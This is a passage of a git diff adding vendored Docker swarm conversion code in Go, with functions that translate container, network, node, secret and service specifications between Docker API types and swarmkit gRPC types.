+				ClusterID:      cluster.ID,
+				ClusterVersion: &cluster.Meta.Version,
+				Spec:           &clusterSpec,
+			})
+			if err != nil {
+				return fmt.Errorf("error updating cluster settings: %v", err)
+			}
+			return nil
+		}
+	}
+	return ctx.Err()
+}
+
+func detectLockedError(err error) error {
+	if err == swarmnode.ErrInvalidUnlockKey {
+		return errors.WithStack(ErrSwarmLocked)
+	}
+	return err
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/container.go b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go
new file mode 100644
index 0000000000..10383f749b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/container.go
@@ -0,0 +1,235 @@
+package convert
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/Sirupsen/logrus"
+	container "github.com/docker/docker/api/types/container"
+	mounttypes "github.com/docker/docker/api/types/mount"
+	types "github.com/docker/docker/api/types/swarm"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+)
+
+func containerSpecFromGRPC(c *swarmapi.ContainerSpec) types.ContainerSpec {
+	containerSpec := types.ContainerSpec{
+		Image:     c.Image,
+		Labels:    c.Labels,
+		Command:   c.Command,
+		Args:      c.Args,
+		Hostname:  c.Hostname,
+		Env:       c.Env,
+		Dir:       c.Dir,
+		User:      c.User,
+		Groups:    c.Groups,
+		TTY:       c.TTY,
+		OpenStdin: c.OpenStdin,
+		Hosts:     c.Hosts,
+		Secrets:   secretReferencesFromGRPC(c.Secrets),
+	}
+
+	if c.DNSConfig != nil {
+		containerSpec.DNSConfig = &types.DNSConfig{
+			Nameservers: c.DNSConfig.Nameservers,
+			Search:      c.DNSConfig.Search,
+			Options:     c.DNSConfig.Options,
+		}
+	}
+
+	// Mounts
+	for _, m := range c.Mounts {
+		mount := mounttypes.Mount{
+			Target:   m.Target,
+			Source:   m.Source,
+			Type:     mounttypes.Type(strings.ToLower(swarmapi.Mount_MountType_name[int32(m.Type)])),
+			ReadOnly: m.ReadOnly,
+		}
+
+		if m.BindOptions != nil {
+			mount.BindOptions = &mounttypes.BindOptions{
+				Propagation: mounttypes.Propagation(strings.ToLower(swarmapi.Mount_BindOptions_MountPropagation_name[int32(m.BindOptions.Propagation)])),
+			}
+		}
+
+		if m.VolumeOptions != nil {
+			mount.VolumeOptions = &mounttypes.VolumeOptions{
+				NoCopy: m.VolumeOptions.NoCopy,
+				Labels: m.VolumeOptions.Labels,
+			}
+			if m.VolumeOptions.DriverConfig != nil {
+				mount.VolumeOptions.DriverConfig = &mounttypes.Driver{
+					Name:    m.VolumeOptions.DriverConfig.Name,
+					Options: m.VolumeOptions.DriverConfig.Options,
+				}
+			}
+		}
+
+		if m.TmpfsOptions != nil {
+			mount.TmpfsOptions = &mounttypes.TmpfsOptions{
+				SizeBytes: m.TmpfsOptions.SizeBytes,
+				Mode:      m.TmpfsOptions.Mode,
+			}
+		}
+		containerSpec.Mounts = append(containerSpec.Mounts, mount)
+	}
+
+	if c.StopGracePeriod != nil {
+		grace, _ := ptypes.Duration(c.StopGracePeriod)
+		containerSpec.StopGracePeriod = &grace
+	}
+
+	if c.Healthcheck != nil {
+		containerSpec.Healthcheck = healthConfigFromGRPC(c.Healthcheck)
+	}
+
+	return containerSpec
+}
+
+func secretReferencesToGRPC(sr []*types.SecretReference) []*swarmapi.SecretReference {
+	refs := make([]*swarmapi.SecretReference, 0, len(sr))
+	for _, s := range sr {
+		ref := &swarmapi.SecretReference{
+			SecretID:   s.SecretID,
+			SecretName: s.SecretName,
+		}
+		if s.File != nil {
+			ref.Target = &swarmapi.SecretReference_File{
+				File: &swarmapi.SecretReference_FileTarget{
+					Name: s.File.Name,
+					UID:  s.File.UID,
+					GID:  s.File.GID,
+					Mode: s.File.Mode,
+				},
+			}
+		}
+
+		refs = append(refs, ref)
+	}
+
+	return refs
+}
+func secretReferencesFromGRPC(sr []*swarmapi.SecretReference) []*types.SecretReference {
+	refs := make([]*types.SecretReference, 0, len(sr))
+	for _, s := range sr {
+		target := s.GetFile()
+		if target == nil {
+			// not a file target
+			logrus.Warnf("secret target not a file: secret=%s", s.SecretID)
+			continue
+		}
+		refs = append(refs, &types.SecretReference{
+			File: &types.SecretReferenceFileTarget{
+				Name: target.Name,
+				UID:  target.UID,
+				GID:  target.GID,
+				Mode: target.Mode,
+			},
+			SecretID:   s.SecretID,
+			SecretName: s.SecretName,
+		})
+	}
+
+	return refs
+}
+
+func containerToGRPC(c types.ContainerSpec) (*swarmapi.ContainerSpec, error) {
+	containerSpec := &swarmapi.ContainerSpec{
+		Image:     c.Image,
+		Labels:    c.Labels,
+		Command:   c.Command,
+		Args:      c.Args,
+		Hostname:  c.Hostname,
+		Env:       c.Env,
+		Dir:       c.Dir,
+		User:      c.User,
+		Groups:    c.Groups,
+		TTY:       c.TTY,
+		OpenStdin: c.OpenStdin,
+		Hosts:     c.Hosts,
+		Secrets:   secretReferencesToGRPC(c.Secrets),
+	}
+
+	if c.DNSConfig != nil {
+		containerSpec.DNSConfig = &swarmapi.ContainerSpec_DNSConfig{
+			Nameservers: c.DNSConfig.Nameservers,
+			Search:      c.DNSConfig.Search,
+			Options:     c.DNSConfig.Options,
+		}
+	}
+
+	if c.StopGracePeriod != nil {
+		containerSpec.StopGracePeriod = ptypes.DurationProto(*c.StopGracePeriod)
+	}
+
+	// Mounts
+	for _, m := range c.Mounts {
+		mount := swarmapi.Mount{
+			Target:   m.Target,
+			Source:   m.Source,
+			ReadOnly: m.ReadOnly,
+		}
+
+		if mountType, ok := swarmapi.Mount_MountType_value[strings.ToUpper(string(m.Type))]; ok {
+			mount.Type = swarmapi.Mount_MountType(mountType)
+		} else if string(m.Type) != "" {
+			return nil, fmt.Errorf("invalid MountType: %q", m.Type)
+		}
+
+		if m.BindOptions != nil {
+			if mountPropagation, ok := swarmapi.Mount_BindOptions_MountPropagation_value[strings.ToUpper(string(m.BindOptions.Propagation))]; ok {
+				mount.BindOptions = &swarmapi.Mount_BindOptions{Propagation: swarmapi.Mount_BindOptions_MountPropagation(mountPropagation)}
+			} else if string(m.BindOptions.Propagation) != "" {
+				return nil, fmt.Errorf("invalid MountPropagation: %q", m.BindOptions.Propagation)
+			}
+		}
+
+		if m.VolumeOptions != nil {
+			mount.VolumeOptions = &swarmapi.Mount_VolumeOptions{
+				NoCopy: m.VolumeOptions.NoCopy,
+				Labels: m.VolumeOptions.Labels,
+			}
+			if m.VolumeOptions.DriverConfig != nil {
+				mount.VolumeOptions.DriverConfig = &swarmapi.Driver{
+					Name:    m.VolumeOptions.DriverConfig.Name,
+					Options: m.VolumeOptions.DriverConfig.Options,
+				}
+			}
+		}
+
+		if m.TmpfsOptions != nil {
+			mount.TmpfsOptions = &swarmapi.Mount_TmpfsOptions{
+				SizeBytes: m.TmpfsOptions.SizeBytes,
+				Mode:      m.TmpfsOptions.Mode,
+			}
+		}
+
+		containerSpec.Mounts = append(containerSpec.Mounts, mount)
+	}
+
+	if c.Healthcheck != nil {
+		containerSpec.Healthcheck = healthConfigToGRPC(c.Healthcheck)
+	}
+
+	return containerSpec, nil
+}
+
+func healthConfigFromGRPC(h *swarmapi.HealthConfig) *container.HealthConfig {
+	interval, _ := ptypes.Duration(h.Interval)
+	timeout, _ := ptypes.Duration(h.Timeout)
+	return &container.HealthConfig{
+		Test:     h.Test,
+		Interval: interval,
+		Timeout:  timeout,
+		Retries:  int(h.Retries),
+	}
+}
+
+func healthConfigToGRPC(h *container.HealthConfig) *swarmapi.HealthConfig {
+	return &swarmapi.HealthConfig{
+		Test:     h.Test,
+		Interval: ptypes.DurationProto(h.Interval),
+		Timeout:  ptypes.DurationProto(h.Timeout),
+		Retries:  int32(h.Retries),
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/network.go b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go
new file mode 100644
index 0000000000..4d21b4df0a
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/network.go
@@ -0,0 +1,210 @@
+package convert
+
+import (
+	"strings"
+
+	basictypes "github.com/docker/docker/api/types"
+	networktypes "github.com/docker/docker/api/types/network"
+	types "github.com/docker/docker/api/types/swarm"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+)
+
+func networkAttachementFromGRPC(na *swarmapi.NetworkAttachment) types.NetworkAttachment {
+	if na != nil {
+		return types.NetworkAttachment{
+			Network:   networkFromGRPC(na.Network),
+			Addresses: na.Addresses,
+		}
+	}
+	return types.NetworkAttachment{}
+}
+
+func networkFromGRPC(n *swarmapi.Network) types.Network {
+	if n != nil {
+		network := types.Network{
+			ID: n.ID,
+			Spec: types.NetworkSpec{
+				IPv6Enabled: n.Spec.Ipv6Enabled,
+				Internal:    n.Spec.Internal,
+				Attachable:  n.Spec.Attachable,
+				IPAMOptions: ipamFromGRPC(n.Spec.IPAM),
+			},
+			IPAMOptions: ipamFromGRPC(n.IPAM),
+		}
+
+		// Meta
+		network.Version.Index = n.Meta.Version.Index
+		network.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt)
+		network.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt)
+
+		//Annotations
+		network.Spec.Name = n.Spec.Annotations.Name
+		network.Spec.Labels = n.Spec.Annotations.Labels
+
+		//DriverConfiguration
+		if n.Spec.DriverConfig != nil {
+			network.Spec.DriverConfiguration = &types.Driver{
+				Name:    n.Spec.DriverConfig.Name,
+				Options: n.Spec.DriverConfig.Options,
+			}
+		}
+
+		//DriverState
+		if n.DriverState != nil {
+			network.DriverState = types.Driver{
+				Name:    n.DriverState.Name,
+				Options: n.DriverState.Options,
+			}
+		}
+
+		return network
+	}
+	return types.Network{}
+}
+
+func ipamFromGRPC(i *swarmapi.IPAMOptions) *types.IPAMOptions {
+	var ipam *types.IPAMOptions
+	if i != nil {
+		ipam = &types.IPAMOptions{}
+		if i.Driver != nil {
+			ipam.Driver.Name = i.Driver.Name
+			ipam.Driver.Options = i.Driver.Options
+		}
+
+		for _, config := range i.Configs {
+			ipam.Configs = append(ipam.Configs, types.IPAMConfig{
+				Subnet:  config.Subnet,
+				Range:   config.Range,
+				Gateway: config.Gateway,
+			})
+		}
+	}
+	return ipam
+}
+
+func endpointSpecFromGRPC(es *swarmapi.EndpointSpec) *types.EndpointSpec {
+	var endpointSpec *types.EndpointSpec
+	if es != nil {
+		endpointSpec = &types.EndpointSpec{}
+		endpointSpec.Mode = types.ResolutionMode(strings.ToLower(es.Mode.String()))
+
+		for _, portState := range es.Ports {
+			endpointSpec.Ports = append(endpointSpec.Ports, types.PortConfig{
+				Name:          portState.Name,
+				Protocol:      types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])),
+				PublishMode:   types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])),
+				TargetPort:    portState.TargetPort,
+				PublishedPort: portState.PublishedPort,
+			})
+		}
+	}
+	return endpointSpec
+}
+
+func endpointFromGRPC(e *swarmapi.Endpoint) types.Endpoint {
+	endpoint := types.Endpoint{}
+	if e != nil {
+		if espec := endpointSpecFromGRPC(e.Spec); espec != nil {
+			endpoint.Spec = *espec
+		}
+
+		for _, portState := range e.Ports {
+			endpoint.Ports = append(endpoint.Ports, types.PortConfig{
+				Name:          portState.Name,
+				Protocol:      types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(portState.Protocol)])),
+				PublishMode:   types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(portState.PublishMode)])),
+				TargetPort:    portState.TargetPort,
+				PublishedPort: portState.PublishedPort,
+			})
+		}
+
+		for _, v := range e.VirtualIPs {
+			endpoint.VirtualIPs = append(endpoint.VirtualIPs, types.EndpointVirtualIP{
+				NetworkID: v.NetworkID,
+				Addr:      v.Addr})
+		}
+
+	}
+
+	return endpoint
+}
+
+// BasicNetworkFromGRPC converts a grpc Network to a NetworkResource.
+func BasicNetworkFromGRPC(n swarmapi.Network) basictypes.NetworkResource {
+	spec := n.Spec
+	var ipam networktypes.IPAM
+	if spec.IPAM != nil {
+		if spec.IPAM.Driver != nil {
+			ipam.Driver = spec.IPAM.Driver.Name
+			ipam.Options = spec.IPAM.Driver.Options
+		}
+		ipam.Config = make([]networktypes.IPAMConfig, 0, len(spec.IPAM.Configs))
+		for _, ic := range spec.IPAM.Configs {
+			ipamConfig := networktypes.IPAMConfig{
+				Subnet:     ic.Subnet,
+				IPRange:    ic.Range,
+				Gateway:    ic.Gateway,
+				AuxAddress: ic.Reserved,
+			}
+			ipam.Config = append(ipam.Config, ipamConfig)
+		}
+	}
+
+	nr := basictypes.NetworkResource{
+		ID:         n.ID,
+		Name:       n.Spec.Annotations.Name,
+		Scope:      "swarm",
+		EnableIPv6: spec.Ipv6Enabled,
+		IPAM:       ipam,
+		Internal:   spec.Internal,
+		Attachable: spec.Attachable,
+		Labels:     n.Spec.Annotations.Labels,
+	}
+
+	if n.DriverState != nil {
+		nr.Driver = n.DriverState.Name
+		nr.Options = n.DriverState.Options
+	}
+
+	return nr
+}
+
+// BasicNetworkCreateToGRPC converts a NetworkCreateRequest to a grpc NetworkSpec.
+func BasicNetworkCreateToGRPC(create basictypes.NetworkCreateRequest) swarmapi.NetworkSpec {
+	ns := swarmapi.NetworkSpec{
+		Annotations: swarmapi.Annotations{
+			Name:   create.Name,
+			Labels: create.Labels,
+		},
+		DriverConfig: &swarmapi.Driver{
+			Name:    create.Driver,
+			Options: create.Options,
+		},
+		Ipv6Enabled: create.EnableIPv6,
+		Internal:    create.Internal,
+		Attachable:  create.Attachable,
+	}
+	if create.IPAM != nil {
+		driver := create.IPAM.Driver
+		if driver == "" {
+			driver = "default"
+		}
+		ns.IPAM = &swarmapi.IPAMOptions{
+			Driver: &swarmapi.Driver{
+				Name:    driver,
+				Options: create.IPAM.Options,
+			},
+		}
+		ipamSpec := make([]*swarmapi.IPAMConfig, 0, len(create.IPAM.Config))
+		for _, ipamConfig := range create.IPAM.Config {
+			ipamSpec = append(ipamSpec, &swarmapi.IPAMConfig{
+				Subnet:  ipamConfig.Subnet,
+				Range:   ipamConfig.IPRange,
+				Gateway: ipamConfig.Gateway,
+			})
+		}
+		ns.IPAM.Configs = ipamSpec
+	}
+	return ns
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/node.go b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go
new file mode 100644
index 0000000000..306f34e0b2
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/node.go
@@ -0,0 +1,89 @@
+package convert
+
+import (
+	"fmt"
+	"strings"
+
+	types "github.com/docker/docker/api/types/swarm"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+)
+
+// NodeFromGRPC converts a grpc Node to a Node.
+func NodeFromGRPC(n swarmapi.Node) types.Node {
+	node := types.Node{
+		ID: n.ID,
+		Spec: types.NodeSpec{
+			Role:         types.NodeRole(strings.ToLower(n.Spec.Role.String())),
+			Availability: types.NodeAvailability(strings.ToLower(n.Spec.Availability.String())),
+		},
+		Status: types.NodeStatus{
+			State:   types.NodeState(strings.ToLower(n.Status.State.String())),
+			Message: n.Status.Message,
+			Addr:    n.Status.Addr,
+		},
+	}
+
+	// Meta
+	node.Version.Index = n.Meta.Version.Index
+	node.CreatedAt, _ = ptypes.Timestamp(n.Meta.CreatedAt)
+	node.UpdatedAt, _ = ptypes.Timestamp(n.Meta.UpdatedAt)
+
+	//Annotations
+	node.Spec.Name = n.Spec.Annotations.Name
+	node.Spec.Labels = n.Spec.Annotations.Labels
+
+	//Description
+	if n.Description != nil {
+		node.Description.Hostname = n.Description.Hostname
+		if n.Description.Platform != nil {
+			node.Description.Platform.Architecture = n.Description.Platform.Architecture
+			node.Description.Platform.OS = n.Description.Platform.OS
+		}
+		if n.Description.Resources != nil {
+			node.Description.Resources.NanoCPUs = n.Description.Resources.NanoCPUs
+			node.Description.Resources.MemoryBytes = n.Description.Resources.MemoryBytes
+		}
+		if n.Description.Engine != nil {
+			node.Description.Engine.EngineVersion = n.Description.Engine.EngineVersion
+			node.Description.Engine.Labels = n.Description.Engine.Labels
+			for _, plugin := range n.Description.Engine.Plugins {
+				node.Description.Engine.Plugins = append(node.Description.Engine.Plugins, types.PluginDescription{Type: plugin.Type, Name: plugin.Name})
+			}
+		}
+	}
+
+	//Manager
+	if n.ManagerStatus != nil {
+		node.ManagerStatus = &types.ManagerStatus{
+			Leader:       n.ManagerStatus.Leader,
+			Reachability: types.Reachability(strings.ToLower(n.ManagerStatus.Reachability.String())),
+			Addr:         n.ManagerStatus.Addr,
+		}
+	}
+
+	return node
+}
+
+// NodeSpecToGRPC converts a NodeSpec to a grpc NodeSpec.
+func NodeSpecToGRPC(s types.NodeSpec) (swarmapi.NodeSpec, error) {
+	spec := swarmapi.NodeSpec{
+		Annotations: swarmapi.Annotations{
+			Name:   s.Name,
+			Labels: s.Labels,
+		},
+	}
+	if role, ok := swarmapi.NodeRole_value[strings.ToUpper(string(s.Role))]; ok {
+		spec.Role = swarmapi.NodeRole(role)
+	} else {
+		return swarmapi.NodeSpec{}, fmt.Errorf("invalid Role: %q", s.Role)
+	}
+
+	if availability, ok := swarmapi.NodeSpec_Availability_value[strings.ToUpper(string(s.Availability))]; ok {
+		spec.Availability = swarmapi.NodeSpec_Availability(availability)
+	} else {
+		return swarmapi.NodeSpec{}, fmt.Errorf("invalid Availability: %q", s.Availability)
+	}
+
+	return spec, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go
new file mode 100644
index 0000000000..3e966873f4
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go
@@ -0,0 +1,64 @@
+package convert
+
+import (
+	swarmtypes "github.com/docker/docker/api/types/swarm"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+)
+
+// SecretFromGRPC converts a grpc Secret to a Secret.
+func SecretFromGRPC(s *swarmapi.Secret) swarmtypes.Secret {
+	secret := swarmtypes.Secret{
+		ID: s.ID,
+		Spec: swarmtypes.SecretSpec{
+			Annotations: swarmtypes.Annotations{
+				Name:   s.Spec.Annotations.Name,
+				Labels: s.Spec.Annotations.Labels,
+			},
+			Data: s.Spec.Data,
+		},
+	}
+
+	secret.Version.Index = s.Meta.Version.Index
+	// Meta
+	secret.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt)
+	secret.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt)
+
+	return secret
+}
+
+// SecretSpecToGRPC converts Secret to a grpc Secret.
+func SecretSpecToGRPC(s swarmtypes.SecretSpec) swarmapi.SecretSpec {
+	return swarmapi.SecretSpec{
+		Annotations: swarmapi.Annotations{
+			Name:   s.Name,
+			Labels: s.Labels,
+		},
+		Data: s.Data,
+	}
+}
+
+// SecretReferencesFromGRPC converts a slice of grpc SecretReference to SecretReference
+func SecretReferencesFromGRPC(s []*swarmapi.SecretReference) []*swarmtypes.SecretReference {
+	refs := []*swarmtypes.SecretReference{}
+
+	for _, r := range s {
+		ref := &swarmtypes.SecretReference{
+			SecretID:   r.SecretID,
+			SecretName: r.SecretName,
+		}
+
+		if t, ok := r.Target.(*swarmapi.SecretReference_File); ok {
+			ref.File = &swarmtypes.SecretReferenceFileTarget{
+				Name: t.File.Name,
+				UID:  t.File.UID,
+				GID:  t.File.GID,
+				Mode: t.File.Mode,
+			}
+		}
+
+		refs = append(refs, ref)
+	}
+
+	return refs
+}
diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/service.go b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go
new file mode 100644
index 0000000000..aa68e01f44
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go
@@ -0,0 +1,366 @@
+package convert
+
+import (
+	"fmt"
+	"strings"
+
+	types "github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/namesgenerator"
+	swarmapi "github.com/docker/swarmkit/api"
+	"github.com/docker/swarmkit/protobuf/ptypes"
+)
+
+// ServiceFromGRPC converts a grpc Service to a Service.
+func ServiceFromGRPC(s swarmapi.Service) types.Service {
+	service := types.Service{
+		ID:           s.ID,
+		Spec:         *serviceSpecFromGRPC(&s.Spec),
+		PreviousSpec: serviceSpecFromGRPC(s.PreviousSpec),
+
+		Endpoint: endpointFromGRPC(s.Endpoint),
+	}
+
+	// Meta
+	service.Version.Index = s.Meta.Version.Index
+	service.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt)
+	service.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt)
+
+	// UpdateStatus
+	service.UpdateStatus = types.UpdateStatus{}
+	if s.UpdateStatus != nil {
+		switch s.UpdateStatus.State {
+		case swarmapi.UpdateStatus_UPDATING:
+			service.UpdateStatus.State = types.UpdateStateUpdating
+		case swarmapi.UpdateStatus_PAUSED:
+			service.UpdateStatus.State = types.UpdateStatePaused
+		case swarmapi.UpdateStatus_COMPLETED:
+			service.UpdateStatus.State = types.UpdateStateCompleted
+		}
+
+		service.UpdateStatus.StartedAt, _ = ptypes.Timestamp(s.UpdateStatus.StartedAt)
+		service.UpdateStatus.CompletedAt, _ = ptypes.Timestamp(s.UpdateStatus.CompletedAt)
+		service.UpdateStatus.Message = s.UpdateStatus.Message
+	}
+
+	return service
+}
+
+func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) *types.ServiceSpec {
+	if spec == nil {
+		return nil
+	}
+
+	serviceNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Networks))
+	for _, n := range spec.Networks {
+		serviceNetworks = append(serviceNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases})
+	}
+
+	taskNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Task.Networks))
+	for _, n := range spec.Task.Networks {
+		taskNetworks = append(taskNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases})
+	}
+
+	containerConfig := spec.Task.Runtime.(*swarmapi.TaskSpec_Container).Container
+	convertedSpec := &types.ServiceSpec{
+		Annotations: types.Annotations{
+			Name:   spec.Annotations.Name,
+			Labels: spec.Annotations.Labels,
+		},
+
+		TaskTemplate: types.TaskSpec{
+			ContainerSpec: containerSpecFromGRPC(containerConfig),
+			Resources:     resourcesFromGRPC(spec.Task.Resources),
+			RestartPolicy: restartPolicyFromGRPC(spec.Task.Restart),
+			Placement:     placementFromGRPC(spec.Task.Placement),
+			LogDriver:     driverFromGRPC(spec.Task.LogDriver),
+			Networks:      taskNetworks,
+			ForceUpdate:   spec.Task.ForceUpdate,
+		},
+
+		Networks:     serviceNetworks,
+		EndpointSpec: endpointSpecFromGRPC(spec.Endpoint),
+	}
+
+	// UpdateConfig
+	if spec.Update != nil {
+		convertedSpec.UpdateConfig = &types.UpdateConfig{
+			Parallelism:     spec.Update.Parallelism,
+			MaxFailureRatio: spec.Update.MaxFailureRatio,
+		}
+
+		convertedSpec.UpdateConfig.Delay, _ = ptypes.Duration(&spec.Update.Delay)
+		if spec.Update.Monitor != nil {
+			convertedSpec.UpdateConfig.Monitor, _ = ptypes.Duration(spec.Update.Monitor)
+		}
+
+		switch spec.Update.FailureAction {
+		case swarmapi.UpdateConfig_PAUSE:
+			convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionPause
+		case swarmapi.UpdateConfig_CONTINUE:
+			convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionContinue
+		}
+	}
+
+	// Mode
+	switch t := spec.GetMode().(type) {
+	case *swarmapi.ServiceSpec_Global:
+		convertedSpec.Mode.Global = &types.GlobalService{}
+	case *swarmapi.ServiceSpec_Replicated:
+		convertedSpec.Mode.Replicated = &types.ReplicatedService{
+			Replicas: &t.Replicated.Replicas,
+		}
+	}
+
+	return convertedSpec
+}
+
+// ServiceSpecToGRPC converts a ServiceSpec to a grpc ServiceSpec.
+func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) {
+	name := s.Name
+	if name == "" {
+		name = namesgenerator.GetRandomName(0)
+	}
+
+	serviceNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.Networks))
+	for _, n := range s.Networks {
+		serviceNetworks = append(serviceNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases})
+	}
+
+	taskNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.TaskTemplate.Networks))
+	for _, n := range s.TaskTemplate.Networks {
+		taskNetworks = append(taskNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases})
+	}
+
+	spec := swarmapi.ServiceSpec{
+		Annotations: swarmapi.Annotations{
+			Name:   name,
+			Labels: s.Labels,
+		},
+		Task: swarmapi.TaskSpec{
+			Resources:   resourcesToGRPC(s.TaskTemplate.Resources),
+			LogDriver:   driverToGRPC(s.TaskTemplate.LogDriver),
+			Networks:    taskNetworks,
+			ForceUpdate: s.TaskTemplate.ForceUpdate,
+		},
+		Networks: serviceNetworks,
+	}
+
+	containerSpec, err := containerToGRPC(s.TaskTemplate.ContainerSpec)
+	if err != nil {
+		return swarmapi.ServiceSpec{}, err
+	}
+	spec.Task.Runtime = &swarmapi.TaskSpec_Container{Container: containerSpec}
+
+	restartPolicy, err := restartPolicyToGRPC(s.TaskTemplate.RestartPolicy)
+	if err != nil {
+		return swarmapi.ServiceSpec{}, err
+	}
+	spec.Task.Restart = restartPolicy
+
+	if s.TaskTemplate.Placement != nil {
+		spec.Task.Placement = &swarmapi.Placement{
+			Constraints: s.TaskTemplate.Placement.Constraints,
+		}
+	}
+
+	if s.UpdateConfig != nil {
+		var failureAction swarmapi.UpdateConfig_FailureAction
+		switch s.UpdateConfig.FailureAction {
+		case types.UpdateFailureActionPause, "":
+			failureAction = swarmapi.UpdateConfig_PAUSE
+		case types.UpdateFailureActionContinue:
+			failureAction = swarmapi.UpdateConfig_CONTINUE
+		default:
+			return swarmapi.ServiceSpec{}, fmt.Errorf("unrecongized update failure action %s", s.UpdateConfig.FailureAction)
+		}
+		spec.Update = &swarmapi.UpdateConfig{
+			Parallelism:     s.UpdateConfig.Parallelism,
+			Delay:           *ptypes.DurationProto(s.UpdateConfig.Delay),
+			FailureAction:   failureAction,
+			MaxFailureRatio: s.UpdateConfig.MaxFailureRatio,
+		}
+		if s.UpdateConfig.Monitor != 0 {
+			spec.Update.Monitor = ptypes.DurationProto(s.UpdateConfig.Monitor)
+		}
+	}
+
+	if s.EndpointSpec != nil {
+		if s.EndpointSpec.Mode != "" &&
+			s.EndpointSpec.Mode != types.ResolutionModeVIP &&
+			s.EndpointSpec.Mode != types.ResolutionModeDNSRR {
+			return swarmapi.ServiceSpec{}, fmt.Errorf("invalid resolution mode: %q", s.EndpointSpec.Mode)
+		}
+
+		spec.Endpoint = &swarmapi.EndpointSpec{}
+
+		spec.Endpoint.Mode = swarmapi.EndpointSpec_ResolutionMode(swarmapi.EndpointSpec_ResolutionMode_value[strings.ToUpper(string(s.EndpointSpec.Mode))])
+
+		for _, portConfig := range s.EndpointSpec.Ports {
+			spec.Endpoint.Ports = append(spec.Endpoint.Ports, &swarmapi.PortConfig{
+				Name:          portConfig.Name,
+				Protocol:      swarmapi.PortConfig_Protocol(swarmapi.PortConfig_Protocol_value[strings.ToUpper(string(portConfig.Protocol))]),
+				PublishMode:   swarmapi.PortConfig_PublishMode(swarmapi.PortConfig_PublishMode_value[strings.ToUpper(string(portConfig.PublishMode))]),
+				TargetPort:    portConfig.TargetPort,
+				PublishedPort: portConfig.PublishedPort,
+			})
+		}
+	}
+
+	// Mode
+	if s.Mode.Global != nil && s.Mode.Replicated != nil {
+		return swarmapi.ServiceSpec{}, fmt.Errorf("cannot specify both replicated mode and global mode")
+	}
+
+	if s.Mode.Global != nil {
+		spec.Mode = &swarmapi.ServiceSpec_Global{
+			Global: &swarmapi.GlobalService{},
+		}
+	} else if s.Mode.Replicated != nil && s.Mode.Replicated.Replicas != nil {
+		spec.Mode = &swarmapi.ServiceSpec_Replicated{
+			Replicated: &swarmapi.ReplicatedService{Replicas: *s.Mode.Replicated.Replicas},
+		}
+	} else {
+		spec.Mode = &swarmapi.ServiceSpec_Replicated{
+			Replicated: &swarmapi.ReplicatedService{Replicas: 1},
+		}
+	}
+
+	return spec, nil
+}
+
+func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequirements {
+	var resources *types.ResourceRequirements
+	if res != nil {
+		resources = &types.ResourceRequirements{}
+		if res.Limits != nil {
+			resources.Limits = &types.Resources{
+				NanoCPUs:    res.Limits.NanoCPUs,
+				MemoryBytes: res.Limits.MemoryBytes,
+			}
+		}
+		if res.Reservations != nil {
+			resources.Reservations = &types.Resources{
+				NanoCPUs:    res.Reservations.NanoCPUs,
+				MemoryBytes: res.Reservations.MemoryBytes,
+			}
+		}
+	}
+
+	return resources
+}
+
+func resourcesToGRPC(res *types.ResourceRequirements) *swarmapi.ResourceRequirements {
+	var reqs *swarmapi.ResourceRequirements
+	if res != nil {
+		reqs = &swarmapi.ResourceRequirements{}
+		if res.Limits != nil {
+			reqs.Limits = &swarmapi.Resources{
+				NanoCPUs:    res.Limits.NanoCPUs,
+				MemoryBytes: res.Limits.MemoryBytes,
+			}
+		}
+		if res.Reservations != nil {
+			reqs.Reservations = &swarmapi.Resources{
+				NanoCPUs:    res.Reservations.NanoCPUs,
+				MemoryBytes: res.Reservations.MemoryBytes,
+			}
+
